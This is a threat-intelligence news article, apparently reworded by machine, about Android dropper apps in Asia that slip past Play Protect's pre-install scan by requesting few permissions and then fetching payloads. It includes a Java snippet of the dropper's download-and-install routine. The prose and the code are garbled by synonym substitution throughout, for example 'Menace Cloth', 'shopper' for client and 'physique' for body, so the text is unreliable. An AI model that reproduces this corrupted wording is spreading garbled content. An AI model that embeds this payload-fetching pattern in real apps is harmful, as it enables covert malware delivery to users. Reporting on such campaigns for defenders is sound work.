Android droppers have developed from area of interest installers for heavyweight banking Trojans into common supply frameworks, able to deploying even rudimentary adware or SMS stealers.
Initially, droppers served banking malware households that required elevated Accessibility permissions to reap credentials.
These small functions appeared innocuous at first look, usually masquerading as utility or authorities apps in high-risk areas. As soon as put in, they might fetch their true payload, request highly effective permissions, and activate their malicious routines.
As defenders strengthened pre-installation scanning, risk actors started rethinking their strategy.
In current months, a surge in dropper-based campaigns focusing on Asia—notably India and Southeast Asia—has emerged. Reasonably than rely solely on complicated RATs or monetary Trojans, adversaries now encapsulate easy payloads inside dropper shells.
This technique exploits a important hole in Google Play Defend’s Pilot Program, which performs a pre-installation permission and API scan however permits set up to proceed if the consumer confirms.
Menace Cloth analysts famous that this pivot not solely circumvents upfront defenses but in addition future-proofs operations, enabling fast payload swaps with out modifying the dropper itself.
By embedding minimalist stage-one code that carries no high-risk permissions, trendy droppers slip by means of Pilot Program inspections undetected.
RewardDropMiner (Supply – Menace Cloth)
Menace Cloth researchers recognized variants like RewardDropMiner.B, stripped of its Monero miner and fallback adware, retaining solely the dropper logic to scale back noise and evade detection.
Apps requesting malicious permissions blocked (Supply – Menace Cloth)
As soon as the benign “replace” immediate is accepted by a consumer, a hid routine fetches or decrypts the secondary APK, dynamically requesting RECEIVE_SMS or BIND_NOTIFICATION permissions solely upon first launch of the true payload.
The influence of those campaigns is twofold: defenders lose early visibility into malicious exercise, and operators preserve a steady foothold able to delivering arbitrary payloads.
This modularity permits risk actors to react swiftly to safety updates or legislation enforcement takedowns by importing new payloads behind an unchanged dropper shell hosted on their command-and-control infrastructure.
An infection Mechanism and Evasion Techniques
Delving into the an infection mechanism reveals a multi-stage course of designed for stealth and resiliency. The dropper’s manifest declares solely INTERNET and REQUEST_INSTALL_PACKAGES permissions, avoiding flags in Play Defend’s Pilot scan.
Upon consumer interplay with the “replace” interface, the dropper initiates an HTTPS request to a distant server:-
String payloadUrl = ”
OkHttpClient shopper = new OkHttpClient();
Request request = new Request.Builder().url(payloadUrl).construct();
Response response = shopper.newCall(request).execute();
if (response.isSuccessful()) {
File apk = new File(getExternalFilesDir(null), “payload.apk”);
attempt (FileOutputStream fos = new FileOutputStream(apk)) {
fos.write(response.physique().bytes());
}
Intent installIntent = new Intent(Intent.ACTION_VIEW);
installIntent.setDataAndType(
FileProvider.getUriForFile(this, getPackageName()+”.supplier”, apk),
“software/vnd.android.package-archive”
);
installIntent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
startActivity(installIntent);
}
This snippet exemplifies the dropper’s use of ordinary APIs to obtain and immediate set up of the payload with out triggering high-risk permission alerts.
After set up, the payload’s launcher exercise requests RECEIVE_SMS and BIND_NOTIFICATION, at which level Play Defend could warn the consumer—however usually too late, as belief within the preliminary dropper switch extends to the newly put in app.
These evasion ways spotlight a urgent want for defenders to correlate pre- and post-install scans and to observe side-loaded software habits constantly.
Increase your SOC and assist your group shield your online business with free top-notch risk intelligence: Request TI Lookup Premium Trial.
